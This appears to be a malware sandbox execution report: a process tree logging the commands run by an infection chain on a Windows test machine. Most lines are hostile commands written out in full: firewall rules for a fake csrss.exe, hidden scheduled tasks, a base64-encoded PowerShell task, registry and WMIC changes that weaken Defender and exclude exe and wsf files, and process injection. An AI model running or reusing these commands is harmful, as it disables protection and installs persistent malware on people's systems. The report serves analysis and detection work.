PID 2612 wrote to memory of 1556	2612	Install.exe	cmd.exe
PID 2612 wrote to memory of 1556	2612	Install.exe	cmd.exe
PID 2612 wrote to memory of 1556	2612	Install.exe	cmd.exe
PID 2612 wrote to memory of 1556	2612	Install.exe	cmd.exe
PID 1556 wrote to memory of 1580	1556	cmd.exe	forfiles.exe
PID 1556 wrote to memory of 1580	1556	cmd.exe	forfiles.exe
PID 1556 wrote to memory of 1580	1556	cmd.exe	forfiles.exe
PID 1556 wrote to memory of 1580	1556	cmd.exe	forfiles.exe
PID 1556 wrote to memory of 1580	1556	cmd.exe	forfiles.exe
PID 1556 wrote to memory of 1580	1556	cmd.exe	forfiles.exe

C:\Users\Admin\AppData\Local\Temp\2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe
"C:\Users\Admin\AppData\Local\Temp\2024-05-11_d2f812118c89341715fbff0ba9530396_megazord.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2648

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
2⤵
- Drops startup file
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2908

C:\Users\Admin\Pictures\3hHFjxEGwtHeOycK1vi8FR8E.exe
"C:\Users\Admin\Pictures\3hHFjxEGwtHeOycK1vi8FR8E.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2640

C:\Users\Admin\AppData\Local\Temp\u21c.0.exe
"C:\Users\Admin\AppData\Local\Temp\u21c.0.exe"
4⤵
- Executes dropped EXE
PID:2372

C:\Users\Admin\AppData\Local\Temp\u21c.1.exe
"C:\Users\Admin\AppData\Local\Temp\u21c.1.exe"
4⤵
PID:2600

C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe
"C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1
5⤵
PID:2828

C:\Users\Admin\Pictures\jzI2PCckhM2dr6HoAqLMgUhQ.exe
"C:\Users\Admin\Pictures\jzI2PCckhM2dr6HoAqLMgUhQ.exe"
3⤵
- Modifies firewall policy service
- Executes dropped EXE
- Drops file in System32 directory
PID:1704

C:\Users\Admin\Pictures\UplzBhiVxHl5tGYUAFx2wpip.exe
"C:\Users\Admin\Pictures\UplzBhiVxHl5tGYUAFx2wpip.exe"
3⤵
- Executes dropped EXE
PID:1644

C:\Users\Admin\Pictures\UplzBhiVxHl5tGYUAFx2wpip.exe
"C:\Users\Admin\Pictures\UplzBhiVxHl5tGYUAFx2wpip.exe"
4⤵
PID:2992

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:1504

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:1940

C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
5⤵
PID:1784

C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
6⤵
- Creates scheduled task(s)
PID:1712

C:\Windows\system32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
6⤵
PID:2952

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
6⤵
PID:1216

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
6⤵
PID:568

C:\Users\Admin\Pictures\ZrDm2chC20nLcS3ajgbRs7t9.exe
"C:\Users\Admin\Pictures\ZrDm2chC20nLcS3ajgbRs7t9.exe"
3⤵
- Executes dropped EXE
PID:2180

C:\Users\Admin\Pictures\ZrDm2chC20nLcS3ajgbRs7t9.exe
"C:\Users\Admin\Pictures\ZrDm2chC20nLcS3ajgbRs7t9.exe"
4⤵
PID:1356

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:2200

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:1524

C:\Users\Admin\Pictures\5Tkrcmuc8ElvVtPywoDW5yx0.exe
"C:\Users\Admin\Pictures\5Tkrcmuc8ElvVtPywoDW5yx0.exe"
3⤵
- Executes dropped EXE
PID:2804

C:\Users\Admin\Pictures\5Tkrcmuc8ElvVtPywoDW5yx0.exe
"C:\Users\Admin\Pictures\5Tkrcmuc8ElvVtPywoDW5yx0.exe"
4⤵
PID:2812

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:2952

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:2880

C:\Users\Admin\Pictures\Hi9AsPsI9BxRRQGmEu8tGHJP.exe
"C:\Users\Admin\Pictures\Hi9AsPsI9BxRRQGmEu8tGHJP.exe"
3⤵
- Executes dropped EXE
PID:1592

C:\Users\Admin\Pictures\Hi9AsPsI9BxRRQGmEu8tGHJP.exe
"C:\Users\Admin\Pictures\Hi9AsPsI9BxRRQGmEu8tGHJP.exe"
4⤵
PID:2740

C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
5⤵
PID:1308

C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
6⤵
- Modifies Windows Firewall
PID:2536

C:\Users\Admin\Pictures\Vsr8rz5tpQExtRR8Faczs6RV.exe
"C:\Users\Admin\Pictures\Vsr8rz5tpQExtRR8Faczs6RV.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2400

C:\Users\Admin\AppData\Local\Temp\7zS11AD.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:2612

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
5⤵
- Suspicious use of WriteProcessMemory
PID:1556

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
6⤵
PID:1580

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
7⤵
PID:1776

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
8⤵
PID:1768

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
6⤵
PID:944

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
7⤵
PID:2336

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
8⤵
PID:1708

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
6⤵
PID:1940

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
7⤵
PID:1948

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
8⤵
PID:1080

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
6⤵
PID:804

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
7⤵
PID:2940

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
8⤵
PID:1544

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
6⤵
PID:2152

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
7⤵
PID:1712

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:2092

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
9⤵
PID:3040

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:472

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:2200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
PID:2240

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:900

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 11:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RmApzrL.exe\" it /aaOdidhaLc 385118 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:3036

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
5⤵
PID:2396

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
6⤵
PID:1640

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
7⤵
PID:2360

C:\Users\Admin\Pictures\I2AGIiuI3VKg5s8qwWnhH1be.exe
"C:\Users\Admin\Pictures\I2AGIiuI3VKg5s8qwWnhH1be.exe"
3⤵
PID:948

C:\Users\Admin\AppData\Local\Temp\7zS9398.tmp\Install.exe
.\Install.exe /tEdidDDf "385118" /S
4⤵
PID:592

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
5⤵
PID:2636

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
6⤵
PID:2160

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
7⤵
PID:2376

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
8⤵
PID:2532

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
6⤵
PID:1104

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
7⤵
PID:2720

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
8⤵
PID:1748

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
6⤵
PID:796

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
7⤵
PID:1424

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
8⤵
PID:2928

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
6⤵
PID:2744

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
7⤵
PID:2432

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
8⤵
PID:792

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
6⤵
PID:2772

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
7⤵
PID:896

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
8⤵
- Command and Scripting Interpreter: PowerShell
PID:776

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
9⤵
PID:1548

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
5⤵
PID:1100

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
6⤵
PID:2848

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
7⤵
- Command and Scripting Interpreter: PowerShell
PID:2000

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
8⤵
PID:1572

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 11:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\HGuESBA.exe\" it /bHwdidhHOl 385118 /S" /V1 /F
5⤵
- Creates scheduled task(s)
PID:1380

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
5⤵
PID:3004

C:\Windows\SysWOW64\cmd.exe
/C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
6⤵
PID:2088

\??\c:\windows\SysWOW64\schtasks.exe
schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
7⤵
PID:1500

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240511115609.log C:\Windows\Logs\CBS\CbsPersist_20240511115609.cab
1⤵
PID:1092

C:\Windows\system32\taskeng.exe
taskeng.exe {780C349A-F12D-4AC6-9EB2-B4A73D47E046} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
PID:2476

C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RmApzrL.exe
C:\Users\Admin\AppData\Local\Temp\pzWhdRqbDjaoGSUyA\tLVYvupllyMnDiy\RmApzrL.exe it /aaOdidhaLc 385118 /S
2⤵
PID:2164

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:2676

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
4⤵
PID:3040

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:1008

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
6⤵
PID:588

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
4⤵
PID:1916

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:1820

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
6⤵
PID:1712

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
4⤵
PID:2200

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:1308

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
6⤵
PID:2272

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
4⤵
PID:2040

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:640

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
6⤵
PID:2304

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
4⤵
PID:2524

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
PID:1388

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
6⤵
- Command and Scripting Interpreter: PowerShell
PID:1148

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
7⤵
PID:2616

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gdURLVvsq" /SC once /ST 05:15:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:1288

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gdURLVvsq"
3⤵
PID:2160

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gdURLVvsq"
3⤵
PID:1900

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
3⤵
PID:2156

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
4⤵
PID:472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
5⤵
- Command and Scripting Interpreter: PowerShell
PID:1108

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
6⤵
PID:1084

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2116

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:2776

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
3⤵
PID:1380

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2384

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
3⤵
PID:2316

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:32
4⤵
PID:1244

C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
3⤵
PID:3068

C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WPGfhLqOzAIwKSwi" /t REG_DWORD /d 0 /reg:64
4⤵
PID:2876

C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\WPGfhLqOzAIwKSwi\SzkGsMlZ\vQOqRZpSYWjyycfH.wsf"
3⤵
PID:1744

C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\WPGfhLqOzAIwKSwi\SzkGsMlZ\vQOqRZpSYWjyycfH.wsf"
3⤵
PID:2012

